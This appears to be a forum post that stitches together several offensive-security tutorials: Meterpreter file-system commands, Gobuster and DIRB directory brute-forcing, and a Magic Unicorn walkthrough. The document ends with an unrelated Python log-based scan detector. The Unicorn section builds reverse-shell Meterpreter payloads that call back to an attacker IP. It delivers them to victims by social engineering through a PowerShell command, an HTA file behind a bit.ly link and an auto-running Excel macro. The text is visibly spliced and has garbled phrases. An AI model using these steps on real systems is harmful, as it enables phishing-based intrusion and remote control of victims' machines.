[Guide] How to Meterpreter File System Commands Cheatsheet - NINZA - 05-14-2020

Hey Friends! Did you know that meterpreter is known as Hacker’s Swiss Army Knife!! Well! Now you do.

Meterpreter, a highly developed payload that can be extended dynamically, is known to be Hacker’s Swiss Army Knife. It uses a reflective DLL injection technique to further compromise the target after the attack. Meterpreter is known to influence the functionality of the Metasploit framework. It can help in doing a great many things. Some of these include covering tracks after the attack, accessing the operating system, and dumping hashes.

This article discusses meterpreter’s Stdapi File System Commands. There are 21 commands including cat, cd, pwd, and checksum. Figure 1 summarises them.

Let’s start discussing them.

cat

It is the very first command in the group of Stdapi File System Commands. It reads the contents of a file to the screen. In other words, cat displays a file’s contents. The cat command in meterpreter is the same as the cat command used in Unix/Linux systems. The syntax of cat in meterpreter is as follows:

    cat filename

cd and pwd

Though cd and pwd are two separate commands, they are usually used together. cd stands for change directory and pwd stands for print working directory. You use the pwd command to check the directory you are working in. You can change this directory using the cd command. By default, the current working directory is the one where the connection was established. The syntaxes of the pwd and cd commands in meterpreter are as follows:

    pwd
    cd <path of the folder to change to>

checksum

This command retrieves the checksum of a file. The syntax of the checksum command is as follows:

    checksum [md5/sha1] file1 file2 file3...

cp

This command copies the content of the old file to the new file.
The syntax of the cp command is as follows:

    cp <oldfile> <newfile>

dir

This command lists files. It is an alias for the ls command. It provides crucial details related to any file or directory, such as file permissions, size of file, last modified date, and file name and type. The syntax of the dir command is as follows:

    dir

download

This command downloads remote files and directories from a remote location to the local machine. The syntax of the download command is as follows:

    download [options] src1 src2 src3... destination

edit

This command edits a file. The syntax of the edit command is as follows:

    edit <file name>

When you press the Enter key, the screen displayed is as shown in the below image.

After editing the file, type :x to save the changes and exit, as shown in the below image.

getlwd

This command prints the working directory on the local machine, that is, in our case, Kali Linux. The syntax of the getlwd command is as follows:

    getlwd

getwd

This command prints the working directory. The syntax of the getwd command is as follows:

    getwd

lcd

This command changes the working directory of the local machine, that is, in our case, Kali Linux. The syntax of lcd is as follows:

    lcd

You can see that the local working directory changes to /root/Desktop.

lls

This command lists files on the local machine, that is, in our case, Kali Linux. The syntax of the lls command is as follows:

    lls

lpwd

This command prints the working directory on the local machine, that is, in our case, Kali Linux. It is the same as the getlwd command. The syntax of the lpwd command is as follows:

    lpwd

ls

This command lists files. The syntax of the ls command is as follows:

    ls

mkdir

This command makes a directory. The syntax of the mkdir command is as follows:

    mkdir dir1 dir2 dir3...

mv

This command moves a file from source to destination, and it can also be used to rename the file as shown. The syntax of the mv command is as follows:

    mv oldfile newfile

You can see the moved contents using the cat command.

pwd

This command prints the working directory. The syntax of the pwd command is as follows:

    pwd

rm

This command deletes the specified file. The syntax of the rm command is as follows:

    rm file1 [file2...]

You can see the list of files before and after using the rm command.

rmdir

This command removes the directory. The syntax of the rmdir command is as follows:

    rmdir dir1 dir2 dir3...

search

This command searches for files. The syntax of the search command is as follows:

    search -f *.doc

show_mount

This command lists all mount points/logical drives. The syntax of the show_mount command is as follows:

    show_mount

upload

This command uploads a file or directory. The syntax of the upload command is as follows:

    upload [options] src1 src2 src3... destination

You can see the uploaded file, as shown in the below image.

Hello Friend!! Today we are going to demonstrate URLs and DNS brute force attack for extracting directories and files from inside URLs and sub-domains from DNS by using “Gobuster-tool”.

Gobuster is a tool used to brute-force URLs (directories and files) in websites and DNS subdomains. Gobuster can be downloaded through the apt repository, so execute the following command to install it.

    apt-get install gobuster

Once it is installed, you can interact with it and see all available options with the help of the following command.

    gobuster -h

Common Parameters

Using Wordlist for Directory Brute-Force

You can use the -w option to select a particular wordlist, for example common.txt or medium.txt, to launch a brute-force attack for extracting web directories or files from inside the target URL.

    gobuster -u [To see content please register here] -w /usr/share/wordlists/dirb/common.txt

The above command will dump all possible files and directories with the help of the common.txt wordlist.

Obtaining Full Path for a directory or file

Using the -e option provides a more significant result, as it prints the complete URL when extracting any file or directory.

    gobuster -e -u [To see content please register here] -w /usr/share/wordlists/dirb/common.txt

You can compare the following output result with the previous result.

Hide Status Code

Using the -n option, “no status” mode, prints the output of the results without displaying the status code.

    gobuster -u [To see content please register here] -w /usr/share/wordlists/dirb/common.txt -n

The above command will dump all possible files and directories without displaying their status code.

Verbose Mode

Using the -v option enables the verbose parameter and makes the brute-force attack vigorously on each file or directory.

    gobuster -u [To see content please register here] -w /usr/share/wordlists/dirb/common.txt -v

As you can observe, this time it has dumped the result including status 404 for missing directories or files.

Identify Content-Length

Using the -l option enables the content-length parameter, which displays the size of the response.
A Content-Length header is a number denoting the exact byte length of the HTTP body for the extracted file or directory.

    gobuster -u [To see content please register here] -w /usr/share/wordlists/dirb/common.txt -l

Disable Banner

Gobuster always adds the banner to give a brief introduction of the applied options while launching a brute force attack. By using the -q option we can disable the banner to hide additional information.

    gobuster -u [To see content please register here] -w /usr/share/wordlists/dirb/common.txt -q

From the given below image, you can perceive the difference between the last output results and the current result.

User-Agent Mode

Using -an option enables User-Agent mode to specify a user agent string to send in the request header for extracting directories and files from inside the target URL.

    gobuster -u [To see content please register here] -w /usr/share/wordlists/dirb/common.txt -a Mozilla/5.0 -fw

Obtain Result with Specify Status Code

Using the -s option enables the status code for a specific value such as 302, 200, 403, and 404 and so on to obtain certain request pages.

    gobuster -u [To see content please register here] -w /usr/share/wordlists/dirb/common.txt -s 302
    gobuster -u [To see content please register here] -w /usr/share/wordlists/dirb/common.txt -s 200

From the given below image, you can take reference for the output result obtained for the above commands.

Timeout

Using the -to option enables the timeout parameter for the HTTP request; 10 seconds is the default time limit for the HTTP request.

    gobuster -u [To see content please register here] -w /usr/share/wordlists/dirb/common.txt -to 10s

Appending Forward slash

Using the -f option appends the forward slash while making a brute-force attack on the target URL.

    gobuster -u [To see content please register here] -w /usr/share/wordlists/dirb/common.txt -f

Saving Output Result inside Text File

Using the -o option enables saving the output result in a text file, which can be useful in the future.

    gobuster -u [To see content please register here] -w /usr/share/wordlists/dirb/common.txt -o result.txt

We can check the result.txt file with the help of the cat command.

    cat result.txt

Enumerating Directory with Specific Extension List

There are a lot of situations where we need to extract the directories of a specific extension over the target server, and then we can use the -X parameter of this scan. This parameter accepts the file extension name and then searches the given extension files over the target server or machine.

    gobuster -u [To see content please register here] -w /usr/share/wordlists/dirb/common.txt -x .php

Follow Redirect

Using the -r option enables the redirect parameter, which redirects the HTTP request to another and modifies the status code for a directory or file.

    gobuster -u [To see content please register here] -w /usr/share/wordlists/dirb/common.txt -q
    gobuster -u [To see content please register here] -r -w /usr/share/wordlists/dirb/common.txt -q

You can compare the output result of the default scan with the redirect output result.

HTTP AUTHORIZATION (-u username: password)

HTTP Authentication/Authentication mechanisms are all based on the use of the 401 status code and the WWW-Authenticate response header. The most widely used HTTP authentication mechanism is Basic. The client sends the user name and password as un-encrypted base64 encoded text.

So, in order to bypass this kind of authentication with the help of Gobuster we have used the command below:

    gobuster -u [To see content please register here] -w /usr/share/wordlists/dirb/common.txt -U test -P test

As a result, it shows status code 200 for the test:test authorized credential on the target URL.

DNS Mode

Using the -m option enables DNS mode, which is effective for public network IPs and extracts the sub-domains.

    gobuster -m dns -u google.com -w /usr/share/wordlists/dirb/common.txt

You can observe the output result in the given below result.

Set Threads Number

Using the -t option sets the number of threads to be applied while brute-forcing sub-domain names or directories.

    gobuster -m dns -u google.com -t 100 -w /usr/share/wordlists/dirb/common.txt

Obtain sub-domains IPs

Using the -i option enables the IP parameter, which shows the IPs of the extracted sub-domains.

    gobuster -m dns -u google.com -t 100 -w /usr/share/wordlists/dirb/common.txt -i

From the given below result, you can observe that it is showing IPv4 or IPv6 for each extracted sub-domain.

Force Processing Brute Force

It stops extracting the sub-domain names if it meets any Wildcard DNS which is a non-existing domain; therefore use the -fw option to enable the force processing parameter and continue the attack even if there is any Wildcard Domain.

    gobuster -m dns -u google.com -t 100 -w /usr/share/wordlists/dirb/common.txt -fw

Hide Process of Extracting

Using the -np option hides the process of extracting sub-domain names while making the brute force attack.

    gobuster -m dns -u google.com -t 100 -w /usr/share/wordlists/dirb/common.txt -fw -np

Extracting CNAME Records

Using the -cn option enables the CNAME Records parameter of the extracted sub-domains and shows their CNAME records.

    gobuster -m dns -u google.com -t 100 -w /usr/share/wordlists/dirb/common.txt -cn

You can observe the output for the above-executed command in the given below result.

Proxy URL

Using the -p option enables a proxy URL to be used for all requests; by default it works on port 1080. As you can observe, on exploring the target network IP in the web browser it puts up an “Access forbidden error”, which means this web page is running behind some proxy.

To ensure this prediction, we run the gobuster command twice, firstly on port 80 which is by default and further on port 3129 along with the -p option which enables the proxy parameter.

    gobuster -u [To see content please register here] -w /usr/share/wordlists/dirb/common.txt
    gobuster -u [To see content please register here] -w /usr/share/wordlists/dirb/common.txt -p 192.168.1.108:3129

From the given below image, you can take reference for the output result obtained for the above commands; here we haven’t obtained any directory or file on executing the first command, whereas the second command executed successfully.

Magic Unicorn is a simple tool for using a PowerShell downgrade attack that injects shellcode straight into memory. It is based on Matthew Graeber’s PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.

    git clone [To see content please register here]

Once downloaded, go into the directory and run unicorn with the following command to see all the possible methods.

    ./unicorn.py

Powershell Attack Instructions

First, we will try the reverse_tcp payload. As we can see in the main menu, all the commands are already written. We just need to replace the IP with our IP.

    python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.109 4444

Now this will give us two files. One is a text file named “powershell_attack.txt” which has the PowerShell code that will be run in the victim’s machine using social engineering and the other is “unicorn.rc” which is a custom Metasploit file that will automatically set all the parameters and start a listener.

These files will be saved in the directory where unicorn was cloned. Powershell_attack.txt holds the malicious code, and when the victim executes that code in his command prompt, the attacker will get a reverse connection of his machine.

Now let’s set up a listener first. We need to run the Metasploit “unicorn.rc” file using the following command:

    msfconsole -r unicorn.rc

We see a session was obtained in the meterpreter. It was because the PowerShell code was executed in the victim’s command shell. It would have looked something like this:

HTA Attack Instructions

For our next attack, we will be using an HTA payload.

    python unicorn.py windows/meterpreter/reverse_https 192.168.1.109 4455 hta

Now convert your IP in bit.ly URL form and send to the victim and then wait for the user to click on the “launcher.hta” file which could be done using social engineering easily.

So, we set up a Metasploit listener next using the RC file and wait for the user to click on the hta payload.

    msfconsole -r unicorn.rc

As soon as he ran the file, we received a meterpreter session. We checked the system info using the sysinfo command.

Macro Attack Instructions

Now for the third and final payload for this tutorial, we set hands on our beloved macros.

    python unicorn.py windows/meterpreter/reverse_https 192.168.1.109 443 macro

This again creates a text file and a “.rc” file with the same name and on the same destination.

To enable developer mode there are various methods depending upon your version of MS Office. As for a generic approach, let’s say you enabled it like: File->properties->ribbons->developer mode

You will see an extra tab labeled developer once it gets enabled. As for the attack, go to developer->macros and create a new macro named “Auto_Open”.

Simply paste the contents from “powershell_attack.txt” to this xlsx module and save it.

As soon as you click run (little green icon on the top), it will give you an error! Don’t worry! You want that error. It is supposed to happen.

Soon after the error on the user screen, we would have obtained a session successfully in meterpreter! Use sysinfo to double check our successful exploitation using unicorn!

In this article, we are focusing on the transient directory using Kali Linux tool DIRB and trying to find hidden files and directories within a web server.

A path traversal attack, also known as “directory traversal”, aims to access files and directories that are stored outside the web root folder.
By manipulating variables with reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system including application source code, configuration, and critical system files.

Source: [To see content please register here]

Requirements

Target- BWAPP Labs, DVWA Labs,
Attacker – Kali Linux

DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary-based attack against a web server and analyzing the response. It comes with a set of preconfigured attack wordlists for easy usage but you can use your custom wordlists. Also, DIRB sometimes can be used as a classic CGI scanner, but remember it is a content scanner, not a vulnerability scanner.

The main purpose is to help in professional web application auditing, especially in security-related testing. It covers some holes not covered by classic web vulnerability scanners. DIRB looks for specific web objects that other generic CGI scanners can’t look for. It doesn’t search for vulnerabilities nor does it look for web contents that can be vulnerable.

Source: [To see content please register here]

Tool DIRB is built into Kali Linux. Open the terminal and type the following command to get an overview of the tools included in the package:

    dirb

    -a <agent_string> : Specify your custom USER_AGENT.
    -c <cookie_string> : Set a cookie for the HTTP request.
    -f : Fine tunning of NOT_FOUND (404) detection.
    -H <header_string> : Add a custom header to the HTTP request.
    -i : Use case-insensitive search.
    -l : Print “Location” header when found.
    -N <nf_code>: Ignore responses with this HTTP code.
    -o <output_file> : Save output to disk.
    -p <proxy[:port]> : Use this proxy. (Default port is 1080)
    -P <proxy_username:proxy_password> : Proxy Authentication.
    -r : Don’t search recursively.
    -R : Interactive recursion. (Asks for each directory)
    -S : Silent Mode. Don’t show tested words. (For dumb terminals)
    -t : Don’t force an ending ‘/’ on URLs.
    -u <username:password> : HTTP Authentication.
    -v : Show also NOT_FOUND pages.
    -w : Don’t stop on WARNING messages.
    -X <extensions> / -x <exts_file> : Append each word with this extensions.
    -z : Add a milliseconds delay to not cause excessive Flood.

Utilizing Multiple Wordlist for Directory Traversing

The above attack works by using the default wordlist file common.txt, but we can change this wordlist and select another wordlist for directory traversal. You must follow the following path to view all available wordlists.

    cd /usr/share/wordlists/dirb
    ls -la
    cd /usr/share/wordlists/vulns
    ls -la

You can see from the image below that there are many text files available as wordlists; we can use them as required.

Default working of Dirb

In this attack common.txt is set as the default wordlist for directory traversal; the protester can use the following command. Open the terminal and type the following command to start the Brussels Directory attack.

    dirb [To see content please register here]

Using the common.txt file, DIRB returns the enumerated directories found within the target URL as shown in the below image.

Enumerating Directory with Specific Extension List

There are a lot of situations where we need to extract the directories of a specific extension over the target server, and then we can use the -X parameter of the dirb scan. This parameter accepts the file extension name and then searches the given extension files over the target server or machine.

    dirb [To see content please register here] -X .php

The above command will extract all directory paths related to the php extension as shown in the following image.

Save Output to Disk

For the purpose of record maintenance, better readability, and future reference, we save the output of the dirb scan to a file. To do this, we use the -o parameter of the dirb scan, which saves the output of the scan in a text file.

    dirb [To see content please register here] -o output.txt

The above command will generate an output.txt file at the desktop of the enumerated directories.

Now that we have successfully executed the command, let’s traverse to the location to check whether the output has been saved to the file or not. In this case, our location for output is /root/output.txt.

Ignore Unnecessary Status-Code

The Status-Code element is a 3-digit integer where the first digit of the Status-Code defines the class of response and the last two digits do not have any categorization role. In this attack, we are using the -N parameter on code 302 as shown below.

    dirb [To see content please register here] -N 302

As you can grasp from the given screenshot, the dirb scan is ignoring the NOT FOUND code, that is, 302.

Default Working Vs Nonstop on WARNING messages Working

During the normal dirb scan as shown below, some of the pages generate warnings; the dirb scan skips those directories where it encounters any warnings.

    dirb [To see content please register here]

While doing a scan that is to be done very deeply and verbosely, we want the dirb scan to not avoid these warnings and do an in-depth scan, hence we use the -w parameter of the dirb scan.

    dirb [To see content please register here] -w

As you can observe, the highlighted directory /dev/shell is enumerated even after the warning message, which is missing in the default scan.

Speed delay

While working in different scenarios, there are some environments we come across that cannot handle the flood created by the dirb scan, so in those environments it is important that we delay the scan for some time. This can be done easily with the -z parameter of the dirb scan.
In this parameter, the time is provided on the scale of milliseconds. As shown in our given example, we have given 100 seconds delay to dirb.

    dirb [To see content please register here] -z 100

Not recursively (-r)

The dirb scan, by default, scans the directories recursively. It means it scans a directory and then traverses inside that directory to scan for more subdirectories. But in some scenarios, where time is insufficient, we set dirb to not scan recursively. This can be achieved using the -r parameter.

    dirb [To see content please register here] -r

Show NOT Existence Pages

A 404 error is an HTTP status code that means that the page you were trying to reach on a website couldn’t be found on their server. 404 Not Found error messages are frequently customized by individual websites. In some scenarios we need to find the 404 pages too, which dirb skips by default. To find those pages we will use the -v parameter.

    dirb [To see content please register here] -v

From the given below image you can observe it has also extracted all those directories that are relevant to 404 errors.

Extension List (-X parameter) Vs Extension Header (-H parameter)

By using the -X parameter along with the target URL with a specific extension, for example .php, it enumerates all files or directories with the .php extension, but by using the -H parameter with a specific extension, for example .php, along with the target URL, it will enumerate all files or directories named with php as shown in the given below image.

    dirb [To see content please register here] -H .php

Not forcing an ending ‘/’ on URLs (-t)

From the attacks used in the previous situations, in order to run the dirb tool, we will have to add a forward slash (/) at the end of the URL to be accepted in dirb.
In order to check that, we need to try one attack on a URL ending without any forward slash.

    dirb [To see content please register here]

You will observe that the scan doesn’t get executed successfully because of the lack of the forward slash, the importance of which we discussed earlier in this article.

Try this attack once again with the same command with some changes: in order to run that command we have to add -t to the previous command.

    dirb [To see content please register here] -t

Now we can observe that even in the absence of the forward slash, we have still successfully executed the dirb scan.

HTTP AUTHORIZATION (-u username: password)

HTTP Authentication/Authentication mechanisms are all based on the use of the 401 status code and the WWW-Authenticate response header. The most widely used HTTP authentication mechanism is Basic. The client sends the user name and password as unencrypted base64 encoded text.

So, in order to bypass this kind of authentication with the help of dirb we have used the command below:

    dirb [To see content please register here] -u test:test

As a result, it shows status code 200 for the test:test authorized credential on the target URL.

Proxy URL

Using the -p option enables a proxy URL to be used for all requests; by default it works on port 1080. As you can observe, on exploring the target network IP in the web browser it puts up an “Access forbidden error”, which means this web page is running behind some proxy.

To ensure this prediction, we run the dirb command twice, firstly on port 80 which is by default and further on port 3129 along with the -p option which enables the proxy parameter.

    dirb [To see content please register here]
    dirb [To see content please register here] -p 192.168.1.108:3129

From the given below image, you can take reference for the output result obtained for the above commands; here we haven’t obtained any directory or file on executing the first command, whereas the second command executed successfully.
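
Seen from the web server, the wordlist scans described in the Gobuster and DIRB sections above appear as one client requesting many distinct paths, most of them answered with 404. The detection sketch below is an added example, not part of the original post; the log lines, IP addresses, word list and thresholds are all constructed for illustration. It ignores the User-Agent because the post shows it can be set freely with -a, and it includes a wider window because a delay such as DIRB's -z spreads the same requests over a longer time.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" format: ip - user [time] "METHOD path PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"[A-Z]+ (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
SHORT_WINDOW = timedelta(seconds=60)   # assumed threshold for fast scans
LONG_WINDOW = timedelta(minutes=10)    # assumed threshold for delayed scans


def parse_line(line):
    """Return (ip, timestamp, path, status), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    path = m["path"].split("?", 1)[0]          # ignore query strings
    return m["ip"], ts, path, int(m["status"])


def find_enumeration(lines, window=SHORT_WINDOW, min_paths=20, min_miss_ratio=0.8):
    """Flag clients that, inside one sliding window, request at least
    min_paths distinct paths with at least min_miss_ratio of them 404.
    Returns {ip: (distinct_paths, miss_ratio)} for the largest burst seen."""
    recent = defaultdict(deque)                # ip -> (ts, path, status) in window
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, path, status = rec
        q = recent[ip]
        q.append((ts, path, status))
        while ts - q[0][0] > window:           # drop requests older than window
            q.popleft()
        paths = {p for _, p, _ in q}
        if len(paths) < min_paths:
            continue
        ratio = sum(1 for _, _, s in q if s == 404) / len(q)
        if ratio >= min_miss_ratio and len(paths) > flagged.get(ip, (0, 0.0))[0]:
            flagged[ip] = (len(paths), round(ratio, 2))
    return flagged


# Constructed sample data: 30 guessed names, three of which exist on the server.
WORDS = ("admin backup cgi-bin config css db dev docs download files images img "
         "include index.php js lib login logs mail old phpmyadmin private "
         "robots.txt server-status static test tmp upload users wp-admin").split()
EXISTING = {"admin": 301, "index.php": 200, "server-status": 403}


def build_sample_log():
    """Build a constructed access log: a fast scan, a delayed scan, a normal user."""
    t0 = datetime(2020, 5, 14, 10, 0, 0, tzinfo=timezone.utc)
    events = []
    for i, word in enumerate(WORDS):
        status = EXISTING.get(word, 404)
        events.append((t0 + timedelta(milliseconds=100 * i),
                       "203.0.113.50", "/" + word, status))    # fast scan
        events.append((t0 + timedelta(seconds=10 * i),
                       "203.0.113.77", "/" + word, status))    # 10 s delay
    browsing = [("/", 200), ("/css/site.css", 200), ("/login", 200),
                ("/favicon.ico", 404), ("/docs/", 200)]
    for i, (path, status) in enumerate(browsing):
        events.append((t0 + timedelta(seconds=25 * i), "198.51.100.7", path, status))
    events.sort(key=lambda e: e[0])            # logs are written in time order
    return [
        '{} - - [{}] "GET {} HTTP/1.1" {} 512 "-" "Mozilla/5.0"'.format(
            ip, ts.strftime("%d/%b/%Y:%H:%M:%S %z"), path, status)
        for ts, ip, path, status in events
    ]


SAMPLE_LOG = build_sample_log()

if __name__ == "__main__":
    print("60 s window :", find_enumeration(SAMPLE_LOG))
    print("10 min window:", find_enumeration(SAMPLE_LOG, window=LONG_WINDOW))
```

With the 60-second window only the fast client is flagged; the delayed client shows up once the window is widened, and the ordinary visitor is never flagged.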